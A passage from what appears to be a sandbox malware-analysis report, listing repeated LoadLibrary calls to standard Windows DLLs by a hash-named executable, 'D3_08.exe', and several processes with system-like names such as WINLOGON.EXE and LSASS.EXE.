00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000940)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004664)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005576)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005612)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005784)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004040)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004928)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005824)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005792)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005260)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003164)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006032)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006032)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006032)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006032)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006032)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006032)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006044)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005588)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005588)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005588)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005588)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005588)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005588)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004112)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003100)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003168)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003168)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003988)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003988)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003988)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003988)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003988)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003988)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004168)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004168)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004168)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004168)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004168)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005636)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005636)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005636)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005428)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004172)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001916)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002068)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006056)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006056)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll 